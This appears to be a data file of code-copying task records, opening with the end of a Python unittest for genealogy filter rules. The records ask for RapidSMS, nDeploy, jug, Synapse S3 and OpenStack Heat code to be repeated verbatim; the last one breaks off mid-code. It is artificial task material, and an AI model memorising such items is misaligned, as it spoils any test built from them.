self.assertEqual(self.filter_with_rule(rule), set([
b'C6WJQC0GDYP3HZDPR3', b'N88LQCRB363ES5WJ83',
b'03EKQCC2KTNLHFLDRJ', b'M9VKQCJV91X0M12J8']))
def test_changedsince(self):
"""
Test ChangedSince rule.
"""
rule = ChangedSince(['2013-01-01', '2014-01-01'])
self.assertEqual(len(self.filter_with_rule(rule)), 419)
def test_hastag(self):
"""
Test HasTag rule.
"""
rule = HasTag(['ToDo'])
self.assertEqual(self.filter_with_rule(rule), set([]))
def test_hastitle(self):
"""
Test HasTitle rule.
"""
rule = HasTitle(['Albany'])
self.assertEqual(self.filter_with_rule(rule), set([
b'51VJQCXUP61H9JRL66', b'9XBKQCE1LZ7PMJE56G',
b'c9658726d602acadb74e330116a', b'P9MKQCT08Z3YBJV5UB']))
def test_isenclosedby(self):
"""
Test IsEnclosedBy rule.
"""
rule = IsEnclosedBy(['P0001', '0'])
self.assertEqual(self.filter_with_rule(rule), set([
b'EAFKQCR0ED5QWL87EO', b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2',
b'V6ALQCZZFN996CO4D', b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6',
b'PTFKQCKPHO2VC5SYKS', b'PHUJQCJ9R4XQO5Y0WS']))
def test_isenclosedby_inclusive(self):
"""
Test IsEnclosedBy rule with inclusive option.
"""
rule = IsEnclosedBy(['P0001', '1'])
self.assertEqual(self.filter_with_rule(rule), set([
b'c96587262e91149933fcea5f20a', b'EAFKQCR0ED5QWL87EO',
b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2', b'V6ALQCZZFN996CO4D',
b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6', b'PTFKQCKPHO2VC5SYKS',
b'PHUJQCJ9R4XQO5Y0WS']))
if __name__ == "__main__":
unittest.main()
```
|
[
{
"content": "Output the full code verbatim (no extra comments):\n```python\n#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n\nimport rapidsms\nfrom models import *\n\n\nclass App(rapidsms.App):\n def parse(self, msg):\n text = msg.text\n msg.tags = []\n\n # check the contents of this message for EVERY SINGLE\n # TAG that we know of. TODO: cache this for a little\n # while to avoid kicking the crap out of the database\n for tag in Tag.objects.all():\n if tag.match(text):\n\n # log and add this tag object to the message\n self.info(\"Tagged message with: %r\" % (tag))\n msg.tags.append(tag)\n\n # remove this tag from the message string,\n # so other apps don't have to deal with it.\n # this allows the tag syntax to play nice\n # with other prefix-based apps\n text = tag.crop(text)\n\n # if we found and stripped tags out of the\n # message, update the object and log it\n if text != msg.text:\n self.info(\"Message is now: %s\" % (text))\n msg.text = text\n\n # not so important, but make a note if\n # the message didn't contain tags. just\n # in case it _should_ have, we can at\n # least see that the app is working\n else:\n self.debug(\"No tags were found\")\n```",
"role": "user"
}
] |
[
{
"content": "Output the full code verbatim (no extra comments):\n<|memory_start|>```python\n#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n\nimport rapidsms\nfrom models import *\n\n\nclass App(rapidsms.App):\n def parse(self, msg):\n text = msg.text\n msg.tags = []\n\n # check the contents of this message for EVERY SINGLE\n # TAG that we know of. TODO: cache this for a little\n # while to avoid kicking the crap out of the database\n for tag in Tag.objects.all():\n if tag.match(text):\n\n # log and add this tag object to the message\n self.info(\"Tagged message with: %r\" % (tag))\n msg.tags.append(tag)\n\n # remove this tag from the message string,\n # so other apps don't have to deal with it.\n # this allows the tag syntax to play nice\n # with other prefix-based apps\n text = tag.crop(text)\n\n # if we found and stripped tags out of the\n # message, update the object and log it\n if text != msg.text:\n self.info(\"Message is now: %s\" % (text))\n msg.text = text\n\n # not so important, but make a note if\n # the message didn't contain tags. just\n # in case it _should_ have, we can at\n # least see that the app is working\n else:\n self.debug(\"No tags were found\")\n```<|memory_end|>",
"role": "user"
}
] |
```python
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import rapidsms
from models import *
class App(rapidsms.App):
def parse(self, msg):
text = msg.text
msg.tags = []
# check the contents of this message for EVERY SINGLE
# TAG that we know of. TODO: cache this for a little
# while to avoid kicking the crap out of the database
for tag in Tag.objects.all():
if tag.match(text):
# log and add this tag object to the message
self.info("Tagged message with: %r" % (tag))
msg.tags.append(tag)
# remove this tag from the message string,
# so other apps don't have to deal with it.
# this allows the tag syntax to play nice
# with other prefix-based apps
text = tag.crop(text)
# if we found and stripped tags out of the
# message, update the object and log it
if text != msg.text:
self.info("Message is now: %s" % (text))
msg.text = text
# not so important, but make a note if
# the message didn't contain tags. just
# in case it _should_ have, we can at
# least see that the app is working
else:
self.debug("No tags were found")
```
|
[
{
"content": "Replicate the source code:\n```python\n#!/usr/bin/env python\n\n\nimport yaml\nimport argparse\nimport os\n\n\n__author__ = \"Anoop P Alias\"\n__copyright__ = \"Copyright Anoop P Alias\"\n__license__ = \"GPL\"\n__email__ = \"[email protected]\"\n\n\ninstallation_path = \"/opt/nDeploy\" # Absolute Installation Path\nbackend_config_file = installation_path+\"/conf/backends.yaml\"\n\n\n# Function defs\n\n\ndef update_backend(action, backend_category, backend_name, backend_path):\n if not os.path.isfile(backend_config_file):\n open(backend_config_file, 'a').close()\n with open(backend_config_file, 'r') as backend_data_yaml:\n backend_data_yaml_parsed = yaml.safe_load(backend_data_yaml)\n if backend_data_yaml_parsed:\n if backend_category in backend_data_yaml_parsed:\n branch_dict = backend_data_yaml_parsed[backend_category]\n if action == 'add':\n branch_dict[backend_name] = backend_path\n elif action == 'del':\n try:\n del branch_dict[backend_name]\n except KeyError:\n pass\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))\n yaml_file.close()\n else:\n backend_data_yaml_parsed[backend_category] = {backend_name: backend_path}\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))\n yaml_file.close()\n else:\n data_dict = {backend_category: {backend_name: backend_path}}\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(data_dict, default_flow_style=False))\n yaml_file.close()\n\n\nparser = argparse.ArgumentParser(description=\"Register a proxy/application backend for nDeploy\")\nparser.add_argument(\"action\")\nparser.add_argument(\"backend_category\")\nparser.add_argument(\"backend_name\")\nparser.add_argument(\"backend_path\")\nargs = parser.parse_args()\naction = args.action\nb_cat = args.backend_category\nb_name = args.backend_name\nb_path = args.backend_path\nupdate_backend(action, b_cat, b_name, b_path)\n```\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
[
{
"content": "Replicate the source code:\n<|memory_start|>```python\n#!/usr/bin/env python\n\n\nimport yaml\nimport argparse\nimport os\n\n\n__author__ = \"Anoop P Alias\"\n__copyright__ = \"Copyright Anoop P Alias\"\n__license__ = \"GPL\"\n__email__ = \"[email protected]\"\n\n\ninstallation_path = \"/opt/nDeploy\" # Absolute Installation Path\nbackend_config_file = installation_path+\"/conf/backends.yaml\"\n\n\n# Function defs\n\n\ndef update_backend(action, backend_category, backend_name, backend_path):\n if not os.path.isfile(backend_config_file):\n open(backend_config_file, 'a').close()\n with open(backend_config_file, 'r') as backend_data_yaml:\n backend_data_yaml_parsed = yaml.safe_load(backend_data_yaml)\n if backend_data_yaml_parsed:\n if backend_category in backend_data_yaml_parsed:\n branch_dict = backend_data_yaml_parsed[backend_category]\n if action == 'add':\n branch_dict[backend_name] = backend_path\n elif action == 'del':\n try:\n del branch_dict[backend_name]\n except KeyError:\n pass\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))\n yaml_file.close()\n else:\n backend_data_yaml_parsed[backend_category] = {backend_name: backend_path}\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))\n yaml_file.close()\n else:\n data_dict = {backend_category: {backend_name: backend_path}}\n with open(backend_config_file, 'w')as yaml_file:\n yaml_file.write(yaml.dump(data_dict, default_flow_style=False))\n yaml_file.close()\n\n\nparser = argparse.ArgumentParser(description=\"Register a proxy/application backend for nDeploy\")\nparser.add_argument(\"action\")\nparser.add_argument(\"backend_category\")\nparser.add_argument(\"backend_name\")\nparser.add_argument(\"backend_path\")\nargs = parser.parse_args()\naction = args.action\nb_cat = args.backend_category\nb_name = args.backend_name\nb_path = args.backend_path\nupdate_backend(action, b_cat, b_name, b_path)\n```<|memory_end|>\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
import yaml
import argparse
import os
__author__ = "Anoop P Alias"
__copyright__ = "Copyright Anoop P Alias"
__license__ = "GPL"
__email__ = "[email protected]"
installation_path = "/opt/nDeploy" # Absolute Installation Path
backend_config_file = installation_path+"/conf/backends.yaml"
# Function defs
def update_backend(action, backend_category, backend_name, backend_path):
if not os.path.isfile(backend_config_file):
open(backend_config_file, 'a').close()
with open(backend_config_file, 'r') as backend_data_yaml:
backend_data_yaml_parsed = yaml.safe_load(backend_data_yaml)
if backend_data_yaml_parsed:
if backend_category in backend_data_yaml_parsed:
branch_dict = backend_data_yaml_parsed[backend_category]
if action == 'add':
branch_dict[backend_name] = backend_path
elif action == 'del':
try:
del branch_dict[backend_name]
except KeyError:
pass
with open(backend_config_file, 'w')as yaml_file:
yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))
yaml_file.close()
else:
backend_data_yaml_parsed[backend_category] = {backend_name: backend_path}
with open(backend_config_file, 'w')as yaml_file:
yaml_file.write(yaml.dump(backend_data_yaml_parsed, default_flow_style=False))
yaml_file.close()
else:
data_dict = {backend_category: {backend_name: backend_path}}
with open(backend_config_file, 'w')as yaml_file:
yaml_file.write(yaml.dump(data_dict, default_flow_style=False))
yaml_file.close()
parser = argparse.ArgumentParser(description="Register a proxy/application backend for nDeploy")
parser.add_argument("action")
parser.add_argument("backend_category")
parser.add_argument("backend_name")
parser.add_argument("backend_path")
args = parser.parse_args()
action = args.action
b_cat = args.backend_category
b_name = args.backend_name
b_path = args.backend_path
update_backend(action, b_cat, b_name, b_path)
```
|
[
{
"content": "Repeat the code exactly:\n```python\nimport numpy as np\nimport sys\nfrom jug import TaskGenerator\nfrom os.path import expanduser\nHOME = expanduser(\"~\")\nif \"storage\" in HOME:\n HOME = \"/storage/home/geffroy\"\nsys.path.append(HOME + \"/Code/PG/Source\")\nfrom phase_fluctuations import DWaveModel\nfrom MCMC import MCMCDriver\n\n# pylint: disable=E1101\n\nN_RUNS = 32\nTARGET_SNAPSHOTS = 32\nTEMPERATURES = [275.0, 320.0, 360.0, 395.0,\n 430.0, 470.0, 490.0, 550.0, 575.0, 625.0]\n\nTHERMALIZATION_STEPS = 150\nROOT_PHASE_SEED = 123456789\nROOT_MC_SEED = 234567\n\nOBSERVABLE_NAME = \"correlation_length\"\nOBSERVABLE_NAME2 = \"DOS\"\n\nMC_SEEDS = [ROOT_MC_SEED + i for i in np.arange(N_RUNS)]\nPHASE_SEEDS = [ROOT_PHASE_SEED + i for i in np.arange(N_RUNS)]\nCOMPUTATION_PARAMS = []\n\nfor i in range(N_RUNS):\n for temp in TEMPERATURES:\n COMPUTATION_PARAMS.append({\"mc_seed\": MC_SEEDS[i],\n \"phase_seed\": PHASE_SEEDS[i],\n \"temperature\": temp})\n\n@TaskGenerator\ndef get_result(in_phase_seed, in_mc_seed, in_temperature):\n \"\"\"generic task generator constructor\"\"\"\n t_cst = 0.25\n\n bcs_params = {\"width\": 32, \"chem_potential\": 0.0,\n \"hopping_constant\": t_cst, \"J_constant\": 0.1 * t_cst / 0.89,\n \"g_constant\": 0.25, \"delta\": 1.0 * t_cst, \"use_assaad\": True,\n \"uniform_phase\": False, \"temperature\": in_temperature,\n \"seed\": in_phase_seed}\n my_model = DWaveModel(bcs_params)\n mc_params = {\"seed\": in_mc_seed, \"intervals\": 5,\n \"target_snapshots\": TARGET_SNAPSHOTS,\n \"observable_list\": [OBSERVABLE_NAME, OBSERVABLE_NAME2],\n \"algorithm\": \"cluster\"}\n my_driver = MCMCDriver(my_model, mc_params)\n my_driver.thermalize(THERMALIZATION_STEPS)\n my_driver.execute()\n return my_driver.result\n\n\n@TaskGenerator\ndef join(partials):\n \"\"\"Put all the results together\"\"\"\n return np.array([my_elem for my_elem in partials])\n\nfullresults = join([get_result(elem[\"phase_seed\"],\n elem[\"mc_seed\"],\n elem[\"temperature\"])\n for elem in COMPUTATION_PARAMS])\n```\nKeep all formatting and sequence.",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly:\n<|memory_start|>```python\nimport numpy as np\nimport sys\nfrom jug import TaskGenerator\nfrom os.path import expanduser\nHOME = expanduser(\"~\")\nif \"storage\" in HOME:\n HOME = \"/storage/home/geffroy\"\nsys.path.append(HOME + \"/Code/PG/Source\")\nfrom phase_fluctuations import DWaveModel\nfrom MCMC import MCMCDriver\n\n# pylint: disable=E1101\n\nN_RUNS = 32\nTARGET_SNAPSHOTS = 32\nTEMPERATURES = [275.0, 320.0, 360.0, 395.0,\n 430.0, 470.0, 490.0, 550.0, 575.0, 625.0]\n\nTHERMALIZATION_STEPS = 150\nROOT_PHASE_SEED = 123456789\nROOT_MC_SEED = 234567\n\nOBSERVABLE_NAME = \"correlation_length\"\nOBSERVABLE_NAME2 = \"DOS\"\n\nMC_SEEDS = [ROOT_MC_SEED + i for i in np.arange(N_RUNS)]\nPHASE_SEEDS = [ROOT_PHASE_SEED + i for i in np.arange(N_RUNS)]\nCOMPUTATION_PARAMS = []\n\nfor i in range(N_RUNS):\n for temp in TEMPERATURES:\n COMPUTATION_PARAMS.append({\"mc_seed\": MC_SEEDS[i],\n \"phase_seed\": PHASE_SEEDS[i],\n \"temperature\": temp})\n\n@TaskGenerator\ndef get_result(in_phase_seed, in_mc_seed, in_temperature):\n \"\"\"generic task generator constructor\"\"\"\n t_cst = 0.25\n\n bcs_params = {\"width\": 32, \"chem_potential\": 0.0,\n \"hopping_constant\": t_cst, \"J_constant\": 0.1 * t_cst / 0.89,\n \"g_constant\": 0.25, \"delta\": 1.0 * t_cst, \"use_assaad\": True,\n \"uniform_phase\": False, \"temperature\": in_temperature,\n \"seed\": in_phase_seed}\n my_model = DWaveModel(bcs_params)\n mc_params = {\"seed\": in_mc_seed, \"intervals\": 5,\n \"target_snapshots\": TARGET_SNAPSHOTS,\n \"observable_list\": [OBSERVABLE_NAME, OBSERVABLE_NAME2],\n \"algorithm\": \"cluster\"}\n my_driver = MCMCDriver(my_model, mc_params)\n my_driver.thermalize(THERMALIZATION_STEPS)\n my_driver.execute()\n return my_driver.result\n\n\n@TaskGenerator\ndef join(partials):\n \"\"\"Put all the results together\"\"\"\n return np.array([my_elem for my_elem in partials])\n\nfullresults = join([get_result(elem[\"phase_seed\"],\n elem[\"mc_seed\"],\n elem[\"temperature\"])\n for elem in COMPUTATION_PARAMS])\n```<|memory_end|>\nKeep all formatting and sequence.",
"role": "user"
}
] |
```python
import numpy as np
import sys
from jug import TaskGenerator
from os.path import expanduser
HOME = expanduser("~")
if "storage" in HOME:
HOME = "/storage/home/geffroy"
sys.path.append(HOME + "/Code/PG/Source")
from phase_fluctuations import DWaveModel
from MCMC import MCMCDriver
# pylint: disable=E1101
N_RUNS = 32
TARGET_SNAPSHOTS = 32
TEMPERATURES = [275.0, 320.0, 360.0, 395.0,
430.0, 470.0, 490.0, 550.0, 575.0, 625.0]
THERMALIZATION_STEPS = 150
ROOT_PHASE_SEED = 123456789
ROOT_MC_SEED = 234567
OBSERVABLE_NAME = "correlation_length"
OBSERVABLE_NAME2 = "DOS"
MC_SEEDS = [ROOT_MC_SEED + i for i in np.arange(N_RUNS)]
PHASE_SEEDS = [ROOT_PHASE_SEED + i for i in np.arange(N_RUNS)]
COMPUTATION_PARAMS = []
for i in range(N_RUNS):
for temp in TEMPERATURES:
COMPUTATION_PARAMS.append({"mc_seed": MC_SEEDS[i],
"phase_seed": PHASE_SEEDS[i],
"temperature": temp})
@TaskGenerator
def get_result(in_phase_seed, in_mc_seed, in_temperature):
"""generic task generator constructor"""
t_cst = 0.25
bcs_params = {"width": 32, "chem_potential": 0.0,
"hopping_constant": t_cst, "J_constant": 0.1 * t_cst / 0.89,
"g_constant": 0.25, "delta": 1.0 * t_cst, "use_assaad": True,
"uniform_phase": False, "temperature": in_temperature,
"seed": in_phase_seed}
my_model = DWaveModel(bcs_params)
mc_params = {"seed": in_mc_seed, "intervals": 5,
"target_snapshots": TARGET_SNAPSHOTS,
"observable_list": [OBSERVABLE_NAME, OBSERVABLE_NAME2],
"algorithm": "cluster"}
my_driver = MCMCDriver(my_model, mc_params)
my_driver.thermalize(THERMALIZATION_STEPS)
my_driver.execute()
return my_driver.result
@TaskGenerator
def join(partials):
"""Put all the results together"""
return np.array([my_elem for my_elem in partials])
fullresults = join([get_result(elem["phase_seed"],
elem["mc_seed"],
elem["temperature"])
for elem in COMPUTATION_PARAMS])
```
|
[
{
"content": "Recreate the entire code block with identical formatting:\n```python\n#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\nimport synapseclient\nimport hashlib\nimport string\n\nscript_path = os.path.dirname(__file__)\nlocal_module_path = os.path.abspath(os.path.join(script_path,'lib'))\nsys.path.append(local_module_path)\nimport s3\n\nSTATIC_BUCKET = \"static.synapse.org\"\n\n\ndef create_html_file(html_link):\n #get a unique file name from txt/link\n html_file_name = str(hashlib.md5(html_link).hexdigest()) + '.html'\n f = open(html_file_name, 'w')\n html_template = string.Template(\"\"\"\n <!DOCTYPE html>\n <html>\n <body>\n <iframe src=\"$HTML_LINK\" width=\"1500\" height=\"1000\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe> \n </body>\n </html>\n \"\"\")\n html_content = html_template.substitute(HTML_LINK=html_link)\n f.write(html_content)\n f.close()\n os.chmod(html_file_name, 0755) #make the file web readable before upload\n return(html_file_name)\n\ndef s3manage(args):\n \"\"\"\n Utilities for managing S3 bukcets\n \"\"\"\n #establish a connection to S3\n bucket = s3.bucketManager(STATIC_BUCKET, args.aws_key, args.aws_secret, rememberMe=args.rememberMe)\n\n #if user specifies an html link\n if args.html_link is not None:\n html_file = create_html_file(args.html_link)\n args.upload_path = html_file\n\n if os.path.isdir(args.upload_path) is True:\n url = bucket.uploadDir(args.upload_path,args.upload_prefix)\n else: \n url = bucket.uploadFiles(args.upload_path,args.upload_prefix)\n\n if args.synapse_wikiID is not None:\n embed_url_in_synapse_wiki(url,args.synapse_wikiID)\n\n\ndef embed_url_in_synapse_wiki(url, wikiID):\n import synapseclient\n syn = synapseclient.login()\n wiki = syn.getWiki(wikiID)\n markdown = wiki['markdown']\n\n #complete hack\n if len(url) > 1:\n url = [url[x] for x in url if x.endswith('index.html')]\n url = url[0]\n else:\n url = url.values()[0]\n\n #percent encoded URL\n import urllib\n url = urllib.quote(url, safe='')\n link_markdown = '${iframe?site=' + url + '&height=1000}'\n wiki['markdown'] = link_markdown\n wiki = syn.store(wiki)\n syn.onweb(wikiID)\n\n\ndef build_parser():\n \"\"\"Builds the argument parser and returns the result.\"\"\"\n\n parser = argparse.ArgumentParser(description='Synapse Python Utilities')\n parser.add_argument('--debug', dest='debug', action='store_true')\n\n subparsers = parser.add_subparsers(title='commands',\n description='The following commands are available:',\n help='For additional help: \"synutils.py <COMMAND> -h\"')\n\n parser_s3 = subparsers.add_parser('s3',help='utilities to manage data on static.synapse.org')\n parser_s3.add_argument('-k' , '--aws_key', dest='aws_key', help='AWS Key', default=None)\n parser_s3.add_argument('-s' , '--aws_secret', dest='aws_secret', help='AWS secret key', default=None)\n parser_s3.add_argument('-up', '--upload', dest='upload_path', type=str, default=None)\n parser_s3.add_argument('-l', '--link', dest='html_link', type=str, default=None,\n help = \"html link to embed in a synapse wiki\")\n parser_s3.add_argument('-w', '--wikiID', dest='synapse_wikiID', type=str, default=None,\n help = \"synapse wiki id to embed the link in\")\n parser_s3.add_argument('-p', '--prefix', dest='upload_prefix', type=str, default='scratch/',\n help = 'prefix adds the sub dir structure on S3 eg. test/ will add the file under test/ folder on s3 bucket')\n parser_s3.add_argument('--rememberMe', '--remember-me', dest='rememberMe', action='store_true', default=False,\n \t\t\t help='Cache credentials for automatic authentication for future interactions')\n parser_s3.set_defaults(func=s3manage)\n return parser\n\n\ndef perform_main(args):\n if 'func' in args:\n try:\n args.func(args)\n except Exception as ex:\n raise\n\ndef main():\n\targs = build_parser().parse_args()\n\tperform_main(args)\n\n\nif __name__ == \"__main__\":\n\tmain()\n```",
"role": "user"
}
] |
[
{
"content": "Recreate the entire code block with identical formatting:\n<|memory_start|>```python\n#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\nimport synapseclient\nimport hashlib\nimport string\n\nscript_path = os.path.dirname(__file__)\nlocal_module_path = os.path.abspath(os.path.join(script_path,'lib'))\nsys.path.append(local_module_path)\nimport s3\n\nSTATIC_BUCKET = \"static.synapse.org\"\n\n\ndef create_html_file(html_link):\n #get a unique file name from txt/link\n html_file_name = str(hashlib.md5(html_link).hexdigest()) + '.html'\n f = open(html_file_name, 'w')\n html_template = string.Template(\"\"\"\n <!DOCTYPE html>\n <html>\n <body>\n <iframe src=\"$HTML_LINK\" width=\"1500\" height=\"1000\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\"></iframe> \n </body>\n </html>\n \"\"\")\n html_content = html_template.substitute(HTML_LINK=html_link)\n f.write(html_content)\n f.close()\n os.chmod(html_file_name, 0755) #make the file web readable before upload\n return(html_file_name)\n\ndef s3manage(args):\n \"\"\"\n Utilities for managing S3 bukcets\n \"\"\"\n #establish a connection to S3\n bucket = s3.bucketManager(STATIC_BUCKET, args.aws_key, args.aws_secret, rememberMe=args.rememberMe)\n\n #if user specifies an html link\n if args.html_link is not None:\n html_file = create_html_file(args.html_link)\n args.upload_path = html_file\n\n if os.path.isdir(args.upload_path) is True:\n url = bucket.uploadDir(args.upload_path,args.upload_prefix)\n else: \n url = bucket.uploadFiles(args.upload_path,args.upload_prefix)\n\n if args.synapse_wikiID is not None:\n embed_url_in_synapse_wiki(url,args.synapse_wikiID)\n\n\ndef embed_url_in_synapse_wiki(url, wikiID):\n import synapseclient\n syn = synapseclient.login()\n wiki = syn.getWiki(wikiID)\n markdown = wiki['markdown']\n\n #complete hack\n if len(url) > 1:\n url = [url[x] for x in url if x.endswith('index.html')]\n url = url[0]\n else:\n url = url.values()[0]\n\n #percent encoded URL\n import urllib\n url = urllib.quote(url, safe='')\n link_markdown = '${iframe?site=' + url + '&height=1000}'\n wiki['markdown'] = link_markdown\n wiki = syn.store(wiki)\n syn.onweb(wikiID)\n\n\ndef build_parser():\n \"\"\"Builds the argument parser and returns the result.\"\"\"\n\n parser = argparse.ArgumentParser(description='Synapse Python Utilities')\n parser.add_argument('--debug', dest='debug', action='store_true')\n\n subparsers = parser.add_subparsers(title='commands',\n description='The following commands are available:',\n help='For additional help: \"synutils.py <COMMAND> -h\"')\n\n parser_s3 = subparsers.add_parser('s3',help='utilities to manage data on static.synapse.org')\n parser_s3.add_argument('-k' , '--aws_key', dest='aws_key', help='AWS Key', default=None)\n parser_s3.add_argument('-s' , '--aws_secret', dest='aws_secret', help='AWS secret key', default=None)\n parser_s3.add_argument('-up', '--upload', dest='upload_path', type=str, default=None)\n parser_s3.add_argument('-l', '--link', dest='html_link', type=str, default=None,\n help = \"html link to embed in a synapse wiki\")\n parser_s3.add_argument('-w', '--wikiID', dest='synapse_wikiID', type=str, default=None,\n help = \"synapse wiki id to embed the link in\")\n parser_s3.add_argument('-p', '--prefix', dest='upload_prefix', type=str, default='scratch/',\n help = 'prefix adds the sub dir structure on S3 eg. test/ will add the file under test/ folder on s3 bucket')\n parser_s3.add_argument('--rememberMe', '--remember-me', dest='rememberMe', action='store_true', default=False,\n \t\t\t help='Cache credentials for automatic authentication for future interactions')\n parser_s3.set_defaults(func=s3manage)\n return parser\n\n\ndef perform_main(args):\n if 'func' in args:\n try:\n args.func(args)\n except Exception as ex:\n raise\n\ndef main():\n\targs = build_parser().parse_args()\n\tperform_main(args)\n\n\nif __name__ == \"__main__\":\n\tmain()\n```<|memory_end|>",
"role": "user"
}
] |
```python
#!/usr/bin/env python
import argparse
import os
import sys
import synapseclient
import hashlib
import string
script_path = os.path.dirname(__file__)
local_module_path = os.path.abspath(os.path.join(script_path,'lib'))
sys.path.append(local_module_path)
import s3
STATIC_BUCKET = "static.synapse.org"
def create_html_file(html_link):
#get a unique file name from txt/link
html_file_name = str(hashlib.md5(html_link).hexdigest()) + '.html'
f = open(html_file_name, 'w')
html_template = string.Template("""
<!DOCTYPE html>
<html>
<body>
<iframe src="$HTML_LINK" width="1500" height="1000" allowfullscreen="true" mozallowfullscreen="true" webkitallowfullscreen="true"></iframe>
</body>
</html>
""")
html_content = html_template.substitute(HTML_LINK=html_link)
f.write(html_content)
f.close()
os.chmod(html_file_name, 0755) #make the file web readable before upload
return(html_file_name)
def s3manage(args):
"""
Utilities for managing S3 bukcets
"""
#establish a connection to S3
bucket = s3.bucketManager(STATIC_BUCKET, args.aws_key, args.aws_secret, rememberMe=args.rememberMe)
#if user specifies an html link
if args.html_link is not None:
html_file = create_html_file(args.html_link)
args.upload_path = html_file
if os.path.isdir(args.upload_path) is True:
url = bucket.uploadDir(args.upload_path,args.upload_prefix)
else:
url = bucket.uploadFiles(args.upload_path,args.upload_prefix)
if args.synapse_wikiID is not None:
embed_url_in_synapse_wiki(url,args.synapse_wikiID)
def embed_url_in_synapse_wiki(url, wikiID):
import synapseclient
syn = synapseclient.login()
wiki = syn.getWiki(wikiID)
markdown = wiki['markdown']
#complete hack
if len(url) > 1:
url = [url[x] for x in url if x.endswith('index.html')]
url = url[0]
else:
url = url.values()[0]
#percent encoded URL
import urllib
url = urllib.quote(url, safe='')
link_markdown = '${iframe?site=' + url + '&height=1000}'
wiki['markdown'] = link_markdown
wiki = syn.store(wiki)
syn.onweb(wikiID)
def build_parser():
"""Builds the argument parser and returns the result."""
parser = argparse.ArgumentParser(description='Synapse Python Utilities')
parser.add_argument('--debug', dest='debug', action='store_true')
subparsers = parser.add_subparsers(title='commands',
description='The following commands are available:',
help='For additional help: "synutils.py <COMMAND> -h"')
parser_s3 = subparsers.add_parser('s3',help='utilities to manage data on static.synapse.org')
parser_s3.add_argument('-k' , '--aws_key', dest='aws_key', help='AWS Key', default=None)
parser_s3.add_argument('-s' , '--aws_secret', dest='aws_secret', help='AWS secret key', default=None)
parser_s3.add_argument('-up', '--upload', dest='upload_path', type=str, default=None)
parser_s3.add_argument('-l', '--link', dest='html_link', type=str, default=None,
help = "html link to embed in a synapse wiki")
parser_s3.add_argument('-w', '--wikiID', dest='synapse_wikiID', type=str, default=None,
help = "synapse wiki id to embed the link in")
parser_s3.add_argument('-p', '--prefix', dest='upload_prefix', type=str, default='scratch/',
help = 'prefix adds the sub dir structure on S3 eg. test/ will add the file under test/ folder on s3 bucket')
parser_s3.add_argument('--rememberMe', '--remember-me', dest='rememberMe', action='store_true', default=False,
help='Cache credentials for automatic authentication for future interactions')
parser_s3.set_defaults(func=s3manage)
return parser
def perform_main(args):
if 'func' in args:
try:
args.func(args)
except Exception as ex:
raise
def main():
args = build_parser().parse_args()
perform_main(args)
if __name__ == "__main__":
main()
```
|
[
{
"content": "Repeat the code exactly:\n```python\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom heat.common import exception\nfrom heat.engine import clients\nfrom heat.engine.resources.neutron import neutron\nfrom heat.engine import scheduler\n\nif clients.neutronclient is not None:\n from neutronclient.common.exceptions import NeutronClientException\n from neutronclient.neutron import v2_0 as neutronV20\n\nfrom heat.openstack.common import log as logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Router(neutron.NeutronResource):\n properties_schema = {'name': {'Type': 'String'},\n 'value_specs': {'Type': 'Map',\n 'Default': {}},\n 'admin_state_up': {'Type': 'Boolean',\n 'Default': True}}\n attributes_schema = {\n \"status\": _(\"The status of the router.\"),\n \"external_gateway_info\": _(\"Gateway network for the router.\"),\n \"name\": _(\"Friendly name of the router.\"),\n \"admin_state_up\": _(\"Administrative state of the router.\"),\n \"tenant_id\": _(\"Tenant owning the router.\"),\n \"show\": _(\"All attributes.\"),\n }\n\n def handle_create(self):\n props = self.prepare_properties(\n self.properties,\n self.physical_resource_name())\n router = self.neutron().create_router({'router': props})['router']\n self.resource_id_set(router['id'])\n\n def _show_resource(self):\n return self.neutron().show_router(\n self.resource_id)['router']\n\n def check_create_complete(self, *args):\n attributes = self._show_resource()\n return self.is_built(attributes)\n\n def handle_delete(self):\n client = self.neutron()\n try:\n client.delete_router(self.resource_id)\n except NeutronClientException as ex:\n if ex.status_code != 404:\n raise ex\n else:\n return scheduler.TaskRunner(self._confirm_delete)()\n\n\nclass RouterInterface(neutron.NeutronResource):\n properties_schema = {\n 'router_id': {\n 'Type': 'String',\n 'Required': True,\n 'Description': _('The router id.')},\n 'subnet_id': {\n 'Type': 'String',\n 'Description': _('The subnet id, either '\n 'subnet_id or port_id should be specified.')},\n 'port_id': {\n 'Type': 'String',\n 'Description': _('The port id, either '\n 'subnet_id or port_id should be specified.')}}\n\n def validate(self):\n '''\n Validate any of the provided params\n '''\n super(RouterInterface, 